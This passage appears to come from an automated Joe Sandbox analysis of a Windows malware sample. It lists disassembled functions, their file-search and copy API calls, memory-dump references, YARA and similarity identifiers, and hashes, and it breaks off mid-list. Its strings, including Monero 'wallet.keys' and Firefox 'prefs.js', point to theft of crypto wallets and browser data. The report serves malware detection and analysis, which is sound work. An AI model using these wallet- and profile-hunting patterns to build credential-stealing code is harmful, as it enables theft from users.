                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                    • String ID: %s\%s$%s\*$@
                                    • API String ID: 671575355-1548028435
                                    • Opcode ID: 5a341143918b295bccd269c06f2411d636c105ef9dc85a8570617ded375692b3
                                    • Instruction ID: 008157d3792b67f5e1a160edadff8076a97d56c98bec219ee41b217e9820c239
                                    • Opcode Fuzzy Hash: 5a341143918b295bccd269c06f2411d636c105ef9dc85a8570617ded375692b3
                                    • Instruction Fuzzy Hash: FD5196B5904208ABCB24EB70DC99FEE737CAB59304F404698F60996150FBB4DB84CFA5
                                    Function 001A40F0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 133fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 001A4113
                                    • FindFirstFileA.KERNEL32(?,?), ref: 001A412A
                                    • StrCmpCA.SHLWAPI(?,001B0F94), ref: 001A4158
                                    • StrCmpCA.SHLWAPI(?,001B0F98), ref: 001A416E
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 001A42BC
                                    • FindClose.KERNEL32(000000FF), ref: 001A42D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$@$p
                                    • API String ID: 180737720-1016689098
                                    • Opcode ID: 550901cccb827bbd136bbc3becb5ed32f705dd17ab62d9ee7ac00644a45c277d
                                    • Instruction ID: 0fd1b0351af3342d72a0e2d6fc8261224801752a4685aa3635a6a13d504a3740
                                    • Opcode Fuzzy Hash: 550901cccb827bbd136bbc3becb5ed32f705dd17ab62d9ee7ac00644a45c277d
                                    • Instruction Fuzzy Hash: 1B5166B5904218ABCB24EBB0DC95EEA737CBB59304F4046D9F60996050FBB0AB85CF65
                                    Function 0019EE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 0019EE3E
                                    • FindFirstFileA.KERNEL32(?,?), ref: 0019EE55
                                    • StrCmpCA.SHLWAPI(?,001B1630), ref: 0019EEAB
                                    • StrCmpCA.SHLWAPI(?,001B1634), ref: 0019EEC1
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0019F3AE
                                    • FindClose.KERNEL32(000000FF), ref: 0019F3C3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 180737720-1013718255
                                    • Opcode ID: a0b97bf27e9eadd2a5b35bbc53dd79735edf7b8c65b6ce560baad6bd1c8a4f0e
                                    • Instruction ID: 0e72ada6a0045ed12acab58e3129c60d85a7a6d3f93d0a94567ec20be7fb4229
                                    • Opcode Fuzzy Hash: a0b97bf27e9eadd2a5b35bbc53dd79735edf7b8c65b6ce560baad6bd1c8a4f0e
                                    • Instruction Fuzzy Hash: 64E1F575911218AADB94FB60CC62EEE737DAF65300F8045D9F50A62092EF706F89CF61
                                    Function 001D0098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                    • API String ID: 0-1562099544
                                    • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                    • Instruction ID: 1b7d06be12ead95299c78830707e91bbba73c0b8902a5b8207e1c70cae65e919
                                    • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                    • Instruction Fuzzy Hash: 78E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                    Function 0019F7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001B16B0,001B0D97), ref: 0019F81E
                                    • StrCmpCA.SHLWAPI(?,001B16B4), ref: 0019F86F
                                    • StrCmpCA.SHLWAPI(?,001B16B8), ref: 0019F885
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0019FBB1
                                    • FindClose.KERNEL32(000000FF), ref: 0019FBC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 3334442632-3783873740
                                    • Opcode ID: bc88bffb3cd0052a71c1140efbd3aa4311139a5634356bad92e09e78daa07e0c
                                    • Instruction ID: 218d87a74d34f88ddbe790ca696ee66aeb6f090a68c26c0d28c27b15e87cec9a
                                    • Opcode Fuzzy Hash: bc88bffb3cd0052a71c1140efbd3aa4311139a5634356bad92e09e78daa07e0c
                                    • Instruction Fuzzy Hash: EDB13675A00218ABCB64FF60DD56FEE7379AF65300F4085A8E50A97151EF306B49CBA2
                                    Function 00191710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001B523C,?,?,?,001B52E4,?,?,00000000,?,00000000), ref: 00191963
                                    • StrCmpCA.SHLWAPI(?,001B538C), ref: 001919B3
                                    • StrCmpCA.SHLWAPI(?,001B5434), ref: 001919C9
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00191D80
                                    • DeleteFileA.KERNEL32(00000000), ref: 00191E0A
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00191E60
                                    • FindClose.KERNEL32(000000FF), ref: 00191E72
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 1415058207-1173974218
                                    • Opcode ID: 6752805cdf53713d06ee1d8bd5791d008ef8c1fa9281dc72225e9dac3567e493
                                    • Instruction ID: 943df10ed4e22b14c1a73bf1fe680935cf7a3726d0f01568fec7785f588b68d8
                                    • Opcode Fuzzy Hash: 6752805cdf53713d06ee1d8bd5791d008ef8c1fa9281dc72225e9dac3567e493
                                    • Instruction Fuzzy Hash: F7120375950219ABCF59FB60CCA6EEE7379AF65300F8045D9B10A62091EF706F88CF61
                                    Function 0019DF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,001B0C32), ref: 0019DF5E
                                    • StrCmpCA.SHLWAPI(?,001B15C0), ref: 0019DFAE
                                    • StrCmpCA.SHLWAPI(?,001B15C4), ref: 0019DFC4
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0019E4E0
                                    • FindClose.KERNEL32(000000FF), ref: 0019E4F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2325840235-1173974218
                                    • Opcode ID: 3aed0ae6518ee77866bc4099f53b7493053a1c734aa5ec1325185dd9e4d9c61f
                                    • Instruction ID: 4e91ff39d8aff9e2cf6367581100659a0560cb401b96dd67fd0c1603ff9075d0
                                    • Opcode Fuzzy Hash: 3aed0ae6518ee77866bc4099f53b7493053a1c734aa5ec1325185dd9e4d9c61f
                                    • Instruction Fuzzy Hash: 90F1CE75954118ABCB65EB60CDA5EEE7379BF65300FC045D9B00A62091EF306F89CF62
                                    Function 0019DB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001B15A8,001B0BAF), ref: 0019DBEB
                                    • StrCmpCA.SHLWAPI(?,001B15AC), ref: 0019DC33
                                    • StrCmpCA.SHLWAPI(?,001B15B0), ref: 0019DC49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0019DECC
                                    • FindClose.KERNEL32(000000FF), ref: 0019DEDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: 468969c0984d469b535331ae994859dae02ba153de60ba337ccf1677ca7b0fc6
                                    • Instruction ID: 3d34e108de7ed2ea7f1ad924e7edfe4d0c944c116290356057d36aa57c9ca6e3
                                    • Opcode Fuzzy Hash: 468969c0984d469b535331ae994859dae02ba153de60ba337ccf1677ca7b0fc6
                                    • Instruction Fuzzy Hash: 6C912676A002049BCF54FB74ED569ED737DAFA5300F4085A8F90656181FF74AB48CBA2
                                    Function 005F45C4 Relevance: 12.8, Strings: 9, Instructions: 1599COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #zOe$$@w>$&h}l$6AF$QY{$Zq$cE~_$r|k$t4|M
                                    • API String ID: 0-291898898
                                    • Opcode ID: 29304acf796993b52b802666623e01e036baf1bae706f6eb48af91f4367e6cb7
                                    • Instruction ID: f13bc3dee1ef0bc82dd8b739e5cb42d16f4e5d86e21db19bf7380a0a37840c6a
                                    • Opcode Fuzzy Hash: 29304acf796993b52b802666623e01e036baf1bae706f6eb48af91f4367e6cb7
                                    • Instruction Fuzzy Hash: 79B219F3A0C2009FE7046E2DEC8567ABBEAEFD4720F1A853DE6C4C7744E53598058696
                                    Function 005E3A91 Relevance: 12.8, Strings: 9, Instructions: 1585COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmpDownload File
